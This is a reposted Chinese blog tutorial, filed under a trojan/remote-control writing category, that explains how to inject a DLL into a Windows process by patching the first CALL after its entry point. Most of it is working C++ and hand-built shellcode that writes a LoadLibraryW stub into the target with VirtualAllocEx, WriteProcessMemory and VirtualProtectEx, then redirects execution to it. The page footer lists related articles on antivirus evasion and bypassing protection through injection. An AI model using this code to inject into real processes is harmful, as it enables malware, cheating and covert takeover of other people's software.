通过修改程序入口点实现dll注入

最新推荐文章于 2024-01-30 18:02:17 发布
最新推荐文章于 2024-01-30 18:02:17 发布
阅读量4.7k 收藏 7
点赞数
分类专栏: windows系统编程 木马/远控编写
    前两节中介绍了通过远线程进行注入的方法。现在换一种方法——修改进程入口点。 (转载请指明出处)

        在PE文件中,其中有个字段标识程序入口点位置。我们通过这个字段,到达程序入口点。PE文件的结构我这儿不讨论(我会在之后写关于PE文件的介绍和研究),我只列出一些和程序入口点有关的数据结构

[cpp] view plain copy
  1. typedef struct _IMAGE_NT_HEADERS {  
  2.     DWORD Signature;  
  3.     IMAGE_FILE_HEADER FileHeader;  
  4.     IMAGE_OPTIONAL_HEADER32 OptionalHeader;  
  5. } IMAGE_NT_HEADERS32, *PIMAGE_NT_HEADERS32;  
[cpp] view plain copy
  1. typedef struct _IMAGE_OPTIONAL_HEADER {  
  2.     //  
  3.     // Standard fields.  
  4.     //  
  5.   
  6.     WORD    Magic;  
  7.     BYTE    MajorLinkerVersion;  
  8.     BYTE    MinorLinkerVersion;  
  9.     DWORD   SizeOfCode;  
  10.     DWORD   SizeOfInitializedData;  
  11.     DWORD   SizeOfUninitializedData;  
  12.     DWORD   AddressOfEntryPoint;  
  13.     DWORD   BaseOfCode;  
  14.     DWORD   BaseOfData;  
  15.   
  16.     //  
  17.     // NT additional fields.  
  18.     //  
  19.   
  20.     DWORD   ImageBase;  
  21.     ……  
  22. }  
其中ImageBase是程序加载的基址,AddressOfEntryPoint是代码执行的入口偏移。于是我们的程序入口点是
[cpp] view plain copy
  1. PIMAGE_DOS_HEADER lpstDosHeader = (PIMAGE_DOS_HEADER)(LPSTR)lpMapFile;  
  2. PIMAGE_NT_HEADERS lpstNtHeaders = (PIMAGE_NT_HEADERS)((LPSTR)lpMapFile + lpstDosHeader->e_lfanew );  
  3. dwPEEntry = lpstNtHeaders->OptionalHeader.AddressOfEntryPoint + lpstNtHeaders->OptionalHeader.ImageBase;  
我们将从程序入口点开始搜索Call这个指令。这个地方存在一个经验,就是一般(如果没动手脚)我们代码第一个Call指令跟随的是一个函数偏移地址。我们用ollydbg打开mspaint.exe这个我们要注入的进程文件
[plain] view plain copy
  1. 01034BD7 > $  6A 70         push    70  
  2. 01034BD9   .  68 00740001   push    01007400  
  3. 01034BDE   .  E8 09040000   call    01034FEC  
用IDA打开之,可以看到
[plain] view plain copy
  1. public _wWinMainCRTStartup  
  2. .text:01034BD7 _wWinMainCRTStartup proc near  
  3. ……  
  4. .text:01034BD7                 push    70h  
  5. .text:01034BD9                 push    offset stru_1007400  
  6. .text:01034BDE                 call    __SEH_prolog  
这个特性很重要,我们在找到被注入进程的第一个call指令后,将之后的偏移量记下来,并计算出真实函数的起始地址。我们程序结束后再jmp到这个真实地址。当然不否认这个方案存在很大风险,比如第一call的不是偏移地址,而是一个寄存器中保存的地址,那么我们这个方案就挂了!
        我们得到第一个Call指令位置和Call的地址后,我们就可以考虑将我们的代码注入到傀儡中。因为我们这次要在代码中动态地修改注入的代码,于是我们需要使用ShellCode,毕竟汇编和01之间还是隔一层的。ShellCode也很好得到,我们写完汇编后,查看该处的16进制码即可。
[cpp] view plain copy
  1. /* 
  2.             $ ==>    >  60              pushad 
  3.             $+1      >  9C              pushfd 
  4.             $+2      >  68 11111111     push    11111111  //加载的dll名称 
  5.             $+7      >  E8 444288A5     call    LoadLibraryW  //LoadLibraryW地址 
  6.             $+C      >  50              push    eax 
  7.             $+D      >  E8 444288A5     call    FreeLibrary  //FreeLibrary地址 
  8.             $+12     >  9D              popfd 
  9.             $+13     >  61              popad 
  10.             $+14     >- E9 495399B6     jmp     33333333  //跳转到第一个call函数开始 
  11.             */  
  12.             BYTE lpShellCode[] = {  
  13.             0x60,  
  14.             0x9c,  
  15.             0x68,0xcc,0xcc,0xcc,0xcc,  
  16.             0xe8,0xcc,0xcc,0xcc,0xcc,  
  17.             0x50,  
  18.             0xe8,0xcc,0xcc,0xcc,0xcc,  
  19.             0x9d,  
  20.             0x61,  
  21.             0xe9,0xcc,0xcc,0xcc,0xcc  
  22.             };  
OK,此处我们预留了4个地址,分别是LoadLibrary加载的DLL的路径的地址,LoadLibrary 和FreeLibrary的地址,以及真实Call函数地址的在ShellCode中的偏移量。下步我们填充这些数据。
[cpp] view plain copy
  1. DWORD dwCallAddrOffset = 0;  
  2. if( FALSE == ReadProcessMemory( hProcess, lpFirstCallAddr, &dwCallAddrOffset, 4, NULL ) ) {  
  3.     break;  
  4. }  
  5.   
  6. // 计算call的目标函数地址  
  7. LPSTR lpRealFuncAddr = lpFirstCallAddr + 4 + dwCallAddrOffset;  
  8.   
  9. DWORD dwDllPathSize =  ( (DWORD) wcslen( lpDllPath ) ) * sizeof(WCHAR);  
  10. LPVOID lpDllPathAddr = VirtualAllocEx( hProcess, NULL, dwDllPathSize, MEM_COMMIT, PAGE_READWRITE );  
  11.   
  12. if( NULL == lpDllPathAddr ) {  
  13.     break;  
  14. }  
  15. if( FALSE == WriteProcessMemory( hProcess, lpDllPathAddr, lpDllPath, dwDllPathSize, NULL) ) {  
  16.     break;  
  17. }  
  18. LPLoadLibrary lpFuncLoadLibraryAddr = LoadLibraryW;  
  19. LPFreeLibrary lpFuncFreeLibraryAddr = FreeLibrary;  
  20. if ( NULL == lpFuncLoadLibraryAddr || NULL == FreeLibrary ) {  
  21.     break;  
  22. }  
  23.   
  24. size_t ShellCodeSize = strlen( (char*)lpShellCode ) + 1;  
  25. LPVOID lpShellCodeAddr = VirtualAllocEx( hProcess, NULL, ShellCodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );  
  26.   
  27. if ( NULL == lpShellCodeAddr  ) {  
  28.     break;  
  29. }  
  30.   
  31. // 修改shellcode  
  32. // 填充DLL路径  
  33. memcpy( lpShellCode + 0x03, &lpDllPathAddr, 4 );  
  34.   
  35. // 填充LoadLibrary偏移  
  36. DWORD dwCallLoadLibraryOffset = (*(LPDWORD)&lpFuncLoadLibraryAddr) -( (*(LPDWORD)&lpShellCodeAddr) + 0x0C );  
  37. memcpy( lpShellCode + 0x08, &dwCallLoadLibraryOffset, 4 );  
  38.   
  39. // 填充FreeLibrary偏移  
  40. DWORD dwCallFreeLibraryOffset = (*(LPDWORD)&lpFuncFreeLibraryAddr) - ( (*(LPDWORD)&lpShellCodeAddr) + 0x12 );  
  41. memcpy( lpShellCode + 0x0E, &dwCallFreeLibraryOffset, 4 );  
  42.   
  43. // 填充返回地址偏移,即原来的Call地址  
  44. DWORD dwRealFuncOffset = (*(LPDWORD)&lpRealFuncAddr) - ( (*(LPDWORD)&lpShellCodeAddr) + 0x19 );  
  45. memcpy( lpShellCode + 0x15, &dwRealFuncOffset, 4  );  
  46.   
  47. // 写入shellcode  
  48. if( FALSE == WriteProcessMemory( hProcess, lpShellCodeAddr, lpShellCode, ShellCodeSize, NULL ) ) {  
  49.     break;  
  50. }  
在我们写入ShellCode后,我们可以拿到ShellCode的地址,然后我们算出它在第一个Call指令的偏移
[cpp] view plain copy
  1. //计算call的新地址  
  2. DWORD dwNewCallAddrOffset = (*(LPDWORD)&lpShellCodeAddr) - ((*(LPDWORD)&lpFirstCallAddr) + 4 );  
之后就要做个非常重要的事情——将新Call地址写入已经载入内存中的傀儡代码中。因为一般PE文件的代码段的内存页是EXECUTE|READ,但是不具备WRITE属性。于是我们要将第一个Call指令所在的内存页的页属性改为PAGE_EXECUTE_READWRITE,我们写入新Call地址后,再将原来的页属性设置回去,善始善终。
[cpp] view plain copy
  1. MEMORY_BASIC_INFORMATION stMemBasicInfor = {0};  
  2. if ( FALSE == VirtualQueryEx( hProcess, lpFirstCallAddr, &stMemBasicInfor, sizeof(MEMORY_BASIC_INFORMATION) ) )  
  3. {  
  4.     break;  
  5. }  
  6. DWORD dwOldProtect = 0;  
  7.   
  8. if ( FALSE == VirtualProtectEx( hProcess, stMemBasicInfor.BaseAddress, stMemBasicInfor.RegionSize, PAGE_EXECUTE_READWRITE, &dwOldProtect ) )  
  9. {  
  10.     break;  
  11. }  
  12.   
  13. if ( FALSE == WriteProcessMemory( hProcess, lpFirstCallAddr, &dwNewCallAddrOffset, 4, NULL ) )  
  14. {  
  15.     break;  
  16. }  
  17.   
  18. VirtualProtectEx( hProcess, stMemBasicInfor.BaseAddress, stMemBasicInfor.RegionSize, dwOldProtect, NULL );  

最简单的修改程序入口点进行注入的方法就是如此。


转自:http://blog.csdn.net/breaksoftware/article/details/7474817


bobopeng
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
过保护注入入口注入_入口注入_驱动注入_驱动保护注入_驱动注入_
10-02
三种方法可以试试过驱动保护 基本游戏都是这个原理注入三步法,过保护可以试试哦欢迎大家下载尝试
Ollydbg->设置
u011513939的博客
06-22 307
1: 打开OD, 选项-> 调试选项->事件. 选择主模块入口 条件跳转指令: 2: OD界面介绍,以及快捷键
OllyDebug的使用方法. IDA Pro分析程序的控制流图,可以找到不同的函数入口. 在汇编代码中定位特定函数可能是一个耗时且复杂的过程
最新发布
chenhao0568的专栏
01-30 2166
OllyDbg” 是一个流行的Windows平台上的汇编级调试器,用于调试和分析二进制程序,尤其是用于逆向工程目的。:首先,您需要在您的计算机上安装OllyDbg。完成安装后,打开程序。:在OllyDbg中,通过击文件菜单中的“打开”来加载您想要调试的可执行文件(.exe)。:加载文件后,OllyDbg将显示程序的汇编代码。您可以浏览代码,查看不同的部分和指令。:为了调试程序,您可能想在特定的指令处设置断。这可以通过右击代码行并选择“设置断”来实现
免杀技术详解
人生代码,代码人生。。。
11-19 3958
[免杀]免杀技术详解 杀毒软件奈我何                     ——免杀技术详解 逆流风 注:本文是去年投给黑客X档案的,与那期的主题乐园内容重叠,故未被选上,我也不另投其他杂志,转贴请注明出处,保留版权。 一、加壳免杀 壳按照性质不同可分为压缩壳和加密壳,使用压缩壳压缩过的软件体积会减小很多,我们常用的UPX、ASPACK、FSG就是压缩壳,加密壳是防止软件被破
【转】从Ollydbg说起-----WinDbg用户态调试教程
狼窝
09-12 6610
【文章标题】: 【原创】从Ollydbg说起-----WinDbg用户态调试教程【文章作者】: 笨笨雄【作者邮箱】: [email protected]【工具】:Windbg 6.6.7.5;Ollydbg 1.10     我假设你已经掌握Ollydbg的使用,并且希望用WinDbg进行内核级的调试。这篇教程将会以Ollydbg为线索,帮助你尽快掌握WinDbg的使用,并简单介绍它的一些特性。我
052 木马免杀全攻略
hackdoors的博客
10-06 3716
木马免杀全攻略 转载自:a1pass.blog.163.com 2007-12-07 14:02:24| 分类: 思绪燃星火——技 | 标签:黑客 杂志刊物 作者:A1Pass 出处:http://a1pass.blog.163.com/ 本文发表于07年第7期《黑客X档案》,与原文有少许出入。 转载请注明版权:http://a1pass.blog.163.com/ A1Pass的博客 黑...
详解最实用的几种dll注入方式
热门推荐
陈子青的博客
07-16 1万+
要谈dll注入,首先则要了解dll,对dll的概念和使用不熟悉的读者可移步所谓DLL注入就是将一个DLL放进某个进程的地址空间里,让它成为那个进程的一部分。这样该进程和dll共享同一内存空间,这样dll可以使用该进程的所有资源,随时监控程序运行。通常,我们将需要实现的功能封装生成dll文件,然后将其注入到某一进程中,从而在该进程中添加或扩展我们需要的功能。因此dll注入技术被广泛运用在恶意攻击、游戏外挂、木马等程序中。.........
修改pe程序入口
qq_44657899的博客
05-26 1379
固定基址-便于调试 修改入口 程序使用x64dbg打开,可以看到程序基址为140000000 程序入口为11023,那么在内存中,程序入口=基址+偏移量=140000000+11023=140011023 ctrl+G定位到140011023,然后找一个空白处,这里选择1400113B3,修改汇编代码为jmp 0x140011023 右键→补丁→修补文件,保存文件为project2.exe,然后将程序入口修改为00113B3 现在运行project2.exe,可以发现入口已经到了140.
VC下提前注入进程的一些方法3——修改程序入口
jmjljmyy的专栏
03-15 612
前两节中介绍了通过远线程进行注入的方法。现在换一种方法——修改进程入口。(转载请指明出处)         在PE文件中,其中有个字段标识程序入口位置。我们通过这个字段,到达程序入口。PE文件的结构我这儿不讨论(我会在之后写关于PE文件的介绍和研究),我只列出一些和程序入口有关的数据结构 [cpp] view plaincopy t
vc6中设置自己的入口函数
weixin_34077371的博客
10-20 623
设置自己的入口函数C或C++程序默认的入口函数是main()或WinMain(),但我们现在不用什么Main,WinMain.因为这些都不是直接的入口,编译器咱产生exe文件的时候,将为我们生成真正的入口.下面我们来定义自己的入口函数,具体是把main或WinMain改成其它的名字(如MyFun),打开"Project(工程)--->settings(设置)...
DLL注入实例+教程
10-17
远程注入DLL方法有很多种,也是很多木马病毒所使用的隐藏进程的方法,因为通过程序加载的DLL在进程管理器是没有显示的.这里介绍一种用 CreateRemoteThread 远程建立线程的方式注入DLL. 首先,我们要提升自己的...
补丁模块(带源码)InlinePatch,Hook,内存DLL注入等等
09-24
程序 InjectDll, 逻辑型, 公开, 向目标进程中注入一个指定 Dll 模块文件;注入成功返回 true, 注入失败则返回 false,CreateRemoteThread法 .参数 进程ID, 整数型, , 进程PID .参数 DLL文件名, 文本型, , 欲注入的...
游戏多开DLL文件 and (硬盘序号HOOK?)
01-23
True.dll是主文件 另外一个VS支持库我修改了导入表加载这个文件的时候会顺带加载...最好是自己加个壳 修改下MD5和程序入口等等 我的程序无壳 无后面 什么都没 默认只HOOK第一个硬盘的序号 第二个的硬盘序号我没添加~
精通Windows.API-函数、接口、编程实例.pdf
01-27
1.1.3 程序入口函数 2 1.1.4 start.c代码分析 2 1.2 编译代码 3 1.2.1 安装Visual Studio 3 1.2.2 安装Microsoft Platform SDK 4 1.2.3 集成Microsoft Platform SDK与Visual C++速成版 5 1.2.4 Vista ...
[转载]OllyDbg完全教程
J0y4n的专栏
02-03 2105
一,什么是 OllyDbg? OllyDbg 是一种具有可视化界面的 32 位汇编-分析调试器。它的特别之处在于可以在没有源代码时解决问题,并且可以处理其它编译器无法解决的难题。 Version 1.10 是最终的发布版本。 这个工程已经停止,我不再继续支持这个软件了。但不用担心:全新打造的 OllyDbg 2.00 不久就会面世! 运行环境: OllyDbg 可以以在任何采用奔腾
DLL 注入技术的 N 种姿势
cplus2009的专栏
08-22 1418
  DLL 注入技术的 N 种姿势 本文中我将介绍DLL注入的相关知识。不算太糟的是,DLL注入技术可以被正常软件用来添加/扩展其他程序,调试或逆向工程的功能性;该技术也常被恶意软件以多种方式利用。这意味着从安全角度来说,了解DLL注入的工作原理是十分必要的。   不久前在为攻击方测试(目的是为了模拟不同类型的攻击行为)开发定制工具的时候,我编写了这个名为“injectAllTheTh...
关于重新指定Dll入口的问题
探索者的专栏
08-08 1130
       大家都明白,在进行Dll开发过程当中,VS将默认指定DllMain为Dll入口。一般情况下我们需要定义自己的入口,如何让我们的程序在加载Dll时直接执行的是我们自定义的入口函数呢?我想很多初学者都不是很了解,本人也曾经为此迷惑了许久,为了方便大家的学习,在这里将其贴出来,供大家参考。       其实方法很简单,只需要我们在Project --〉Setting下面的Link标签中的
Windows系统的dll注入
m0_68937036的博客
03-03 1516
Windows系统的dll注入
怎么使用.net framework对.net程序实现注入dll 进行调试呢
05-28
在.NET Framework中实现DLL注入可以使用以下步骤: 1. 创建一个C#类库项目,编写你要注入DLL代码,并生成DLL文件。 2. 在需要注入DLL的.NET程序中添加引用,将DLL文件添加到.NET程序的引用列表中。 3. 在.NET程序中使用反射机制加载DLL文件,并调用其中的方法。 例如,以下是一个加载和调用DLL的示例代码: ``` using System.Reflection; // 加载DLL文件 Assembly assembly = Assembly.LoadFile("path/to/your/dll"); // 获取要调用的方法 Type type = assembly.GetType("YourNamespace.YourClass"); MethodInfo method = type.GetMethod("YourMethod"); // 调用方法 object result = method.Invoke(null, null); ``` 关于调试.NET程序,你可以使用Visual Studio进行调试。在Visual Studio的“调试”菜单中,选择“附加到进程”,选择.NET程序的进程,即可开始调试。如果你想调试注入DLL,你可以将DLL项目添加到Visual Studio解决方案中,并使用“调试”菜单中的“启动项目”命令来启动DLL项目并进行调试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值